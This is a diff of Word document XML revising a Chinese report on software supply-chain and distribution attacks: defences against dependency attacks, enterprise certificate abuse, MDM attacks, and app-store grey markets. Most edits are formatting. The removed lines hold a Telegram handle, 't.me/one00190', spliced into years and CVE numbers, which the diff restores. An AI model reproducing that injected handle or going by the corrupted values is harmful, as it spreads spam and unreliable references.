+          </w:tblCellMar>
+        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1250" w:type="pct"/>
@@ -6920,31 +7026,7 @@
               <w:rPr>
                 <w:sz w:val="18"/>
               </w:rPr>
-              <w:t>2</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>t.me/one00190</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>26-</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>t.me/one00190</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>5</w:t>
+              <w:t>2026-05</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -7008,6 +7090,11 @@
     </w:tbl>
     <w:p/>
     <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -7026,6 +7113,9 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="420" w:hanging="420"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -7062,6 +7152,9 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="420" w:hanging="420"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -7098,6 +7191,9 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="420" w:hanging="420"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -7134,6 +7230,9 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="420" w:hanging="420"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -7169,12 +7268,16 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="2"/>
-      </w:pPr>
-      <w:bookmarkStart w:id="10" w:name="_Toc242275491"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="9" w:name="_Toc242453627"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">3.4 </w:t>
       </w:r>
       <w:r>
@@ -7183,7 +7286,7 @@
         </w:rPr>
         <w:t>依赖管理攻击的通用防御</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="10"/>
+      <w:bookmarkEnd w:id="9"/>
     </w:p>
     <w:tbl>
       <w:tblPr>
@@ -7204,6 +7307,12 @@
         <w:gridCol w:w="3057"/>
       </w:tblGrid>
       <w:tr>
+        <w:tblPrEx>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1667" w:type="pct"/>
@@ -7275,6 +7384,12 @@
         </w:tc>
       </w:tr>
       <w:tr>
+        <w:tblPrEx>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1667" w:type="pct"/>
@@ -7375,6 +7490,12 @@
         </w:tc>
       </w:tr>
       <w:tr>
+        <w:tblPrEx>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1667" w:type="pct"/>
@@ -7440,6 +7561,12 @@
         </w:tc>
       </w:tr>
       <w:tr>
+        <w:tblPrEx>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1667" w:type="pct"/>
@@ -7540,6 +7667,12 @@
         </w:tc>
       </w:tr>
       <w:tr>
+        <w:tblPrEx>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1667" w:type="pct"/>
@@ -7633,6 +7766,12 @@
         </w:tc>
       </w:tr>
       <w:tr>
+        <w:tblPrEx>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1667" w:type="pct"/>
@@ -7712,6 +7851,12 @@
         </w:tc>
       </w:tr>
       <w:tr>
+        <w:tblPrEx>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1667" w:type="pct"/>
@@ -7781,36 +7926,48 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="1"/>
-      </w:pPr>
-      <w:bookmarkStart w:id="11" w:name="_Toc242275492"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="10" w:name="_Toc242453628"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>四、分发渠道攻击</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="10"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="2"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="11" w:name="_Toc242453629"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve">4.1 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>企业证书滥用</w:t>
+      </w:r>
       <w:bookmarkEnd w:id="11"/>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="2"/>
-      </w:pPr>
-      <w:bookmarkStart w:id="12" w:name="_Toc242275493"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t xml:space="preserve">4.1 </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>企业证书滥用</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="12"/>
-    </w:p>
-    <w:p>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -7826,6 +7983,11 @@
       </w:r>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -7864,6 +8026,11 @@
       </w:r>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -7897,6 +8064,12 @@
         <w:gridCol w:w="3057"/>
       </w:tblGrid>
       <w:tr>
+        <w:tblPrEx>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1667" w:type="pct"/>
@@ -7968,6 +8141,12 @@
         </w:tc>
       </w:tr>
       <w:tr>
+        <w:tblPrEx>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1667" w:type="pct"/>
@@ -8033,6 +8212,12 @@
         </w:tc>
       </w:tr>
       <w:tr>
+        <w:tblPrEx>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1667" w:type="pct"/>
@@ -8126,6 +8311,12 @@
         </w:tc>
       </w:tr>
       <w:tr>
+        <w:tblPrEx>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1667" w:type="pct"/>
@@ -8191,6 +8382,12 @@
         </w:tc>
       </w:tr>
       <w:tr>
+        <w:tblPrEx>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1667" w:type="pct"/>
@@ -8272,6 +8469,11 @@
     </w:tbl>
     <w:p/>
     <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -8290,27 +8492,16 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="422" w:hanging="422"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
           <w:b/>
         </w:rPr>
-        <w:t>2</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:b/>
-        </w:rPr>
-        <w:t>t.me/one00190</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:b/>
-        </w:rPr>
-        <w:t xml:space="preserve">19 </w:t>
+        <w:t xml:space="preserve">2019 </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -8392,41 +8583,16 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="422" w:hanging="422"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
           <w:b/>
         </w:rPr>
-        <w:t>2</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:b/>
-        </w:rPr>
-        <w:t>t.me/one00190</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:b/>
-        </w:rPr>
-        <w:t>2</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:b/>
-        </w:rPr>
-        <w:t>t.me/one00190</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:b/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t xml:space="preserve">2020 </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -8472,33 +8638,22 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="422" w:hanging="422"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
           <w:b/>
         </w:rPr>
-        <w:t>2</w:t>
+        <w:t xml:space="preserve">2024 </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
           <w:b/>
         </w:rPr>
-        <w:t>t.me/one00190</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:b/>
-        </w:rPr>
-        <w:t xml:space="preserve">24 </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:b/>
-        </w:rPr>
         <w:t>年灰色市场研究</w:t>
       </w:r>
       <w:r>
@@ -8511,19 +8666,7 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:t>USENIX Security 2</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>t.me/one00190</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t xml:space="preserve">26 </w:t>
+        <w:t xml:space="preserve">USENIX Security 2026 </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -8545,6 +8688,11 @@
       </w:r>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -8563,6 +8711,9 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="422" w:hanging="422"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -8589,6 +8740,9 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="422" w:hanging="422"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -8608,6 +8762,9 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="422" w:hanging="422"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -8626,8 +8783,11 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="2"/>
-      </w:pPr>
-      <w:bookmarkStart w:id="13" w:name="_Toc242275494"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="12" w:name="_Toc242453630"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -8640,9 +8800,14 @@
         </w:rPr>
         <w:t>（移动设备管理）攻击</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="13"/>
-    </w:p>
-    <w:p>
+      <w:bookmarkEnd w:id="12"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -8658,6 +8823,11 @@
       </w:r>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -8696,6 +8866,11 @@
       </w:r>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -8729,6 +8904,12 @@
         <w:gridCol w:w="3057"/>
       </w:tblGrid>
       <w:tr>
+        <w:tblPrEx>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1667" w:type="pct"/>
@@ -8800,6 +8981,12 @@
         </w:tc>
       </w:tr>
       <w:tr>
+        <w:tblPrEx>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1667" w:type="pct"/>
@@ -8886,6 +9073,12 @@
         </w:tc>
       </w:tr>
       <w:tr>
+        <w:tblPrEx>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1667" w:type="pct"/>
@@ -8951,23 +9144,30 @@
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="1667" w:type="pct"/>
-            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-              <w:rPr>
-                <w:sz w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-                <w:sz w:val="18"/>
-              </w:rPr>
+        <w:tblPrEx>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1667" w:type="pct"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+              <w:rPr>
+                <w:sz w:val="18"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:lastRenderedPageBreak/>
               <w:t xml:space="preserve">MDM </w:t>
             </w:r>
             <w:r>
@@ -9010,35 +9210,7 @@
                 <w:rFonts w:hint="eastAsia"/>
                 <w:sz w:val="18"/>
               </w:rPr>
-              <w:t xml:space="preserve"> CVE-2</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>t.me/one00190</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>23-386</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>t.me/one00190</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>6</w:t>
+              <w:t xml:space="preserve"> CVE-2023-38606</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -9072,6 +9244,12 @@
         </w:tc>
       </w:tr>
       <w:tr>
+        <w:tblPrEx>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1667" w:type="pct"/>
@@ -9160,6 +9338,11 @@
     </w:tbl>
     <w:p/>
     <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -9178,27 +9361,16 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="422" w:hanging="422"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
           <w:b/>
         </w:rPr>
-        <w:t>2</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:b/>
-        </w:rPr>
-        <w:t>t.me/one00190</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:b/>
-        </w:rPr>
-        <w:t xml:space="preserve">15 </w:t>
+        <w:t xml:space="preserve">2015 </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -9256,69 +9428,30 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="422" w:hanging="422"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
           <w:b/>
         </w:rPr>
-        <w:t>2</w:t>
+        <w:t xml:space="preserve">2023 </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
           <w:b/>
         </w:rPr>
-        <w:t>t.me/one00190</w:t>
+        <w:t>年</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
           <w:b/>
         </w:rPr>
-        <w:t xml:space="preserve">23 </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:b/>
-        </w:rPr>
-        <w:t>年</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:b/>
-        </w:rPr>
-        <w:t xml:space="preserve"> CVE-2</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:b/>
-        </w:rPr>
-        <w:t>t.me/one00190</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:b/>
-        </w:rPr>
-        <w:t>23-386</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:b/>
-        </w:rPr>
-        <w:t>t.me/one00190</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:b/>
-        </w:rPr>
-        <w:t>6</w:t>
+        <w:t xml:space="preserve"> CVE-2023-38606</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -9355,47 +9488,36 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="422" w:hanging="422"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
           <w:b/>
         </w:rPr>
-        <w:t>2</w:t>
+        <w:t xml:space="preserve">2026 </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
           <w:b/>
         </w:rPr>
-        <w:t>t.me/one00190</w:t>
+        <w:t>年</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
           <w:b/>
         </w:rPr>
-        <w:t xml:space="preserve">26 </w:t>
+        <w:t xml:space="preserve"> SimpleMDM </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
           <w:b/>
         </w:rPr>
-        <w:t>年</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:b/>
-        </w:rPr>
-        <w:t xml:space="preserve"> SimpleMDM </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:b/>
-        </w:rPr>
         <w:t>漏洞</w:t>
       </w:r>
       <w:r>
@@ -9418,6 +9540,11 @@
       </w:r>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -9436,6 +9563,9 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="422" w:hanging="422"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -9479,6 +9609,9 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="422" w:hanging="422"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -9510,6 +9643,9 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="422" w:hanging="422"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -9547,8 +9683,11 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="2"/>
-      </w:pPr>
-      <w:bookmarkStart w:id="14" w:name="_Toc242275495"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="13" w:name="_Toc242453631"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -9561,9 +9700,14 @@
         </w:rPr>
         <w:t>第三方应用商店与灰色市场</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="14"/>
-    </w:p>
-    <w:p>
+      <w:bookmarkEnd w:id="13"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -9579,6 +9723,11 @@
       </w:r>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -9623,6 +9772,11 @@
       </w:r>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -9656,6 +9810,12 @@
         <w:gridCol w:w="3057"/>
       </w:tblGrid>
       <w:tr>
+        <w:tblPrEx>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1667" w:type="pct"/>
@@ -9727,6 +9887,12 @@
         </w:tc>
       </w:tr>
       <w:tr>
+        <w:tblPrEx>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1667" w:type="pct"/>
@@ -9792,6 +9958,12 @@
         </w:tc>
       </w:tr>
       <w:tr>
+        <w:tblPrEx>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1667" w:type="pct"/>
@@ -9871,6 +10043,12 @@
         </w:tc>
       </w:tr>
       <w:tr>
+        <w:tblPrEx>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1667" w:type="pct"/>
@@ -9950,6 +10128,12 @@
         </w:tc>
       </w:tr>
       <w:tr>
+        <w:tblPrEx>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1667" w:type="pct"/>
@@ -10017,6 +10201,11 @@
     </w:tbl>
     <w:p/>
     <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -10035,6 +10224,9 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="422" w:hanging="422"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
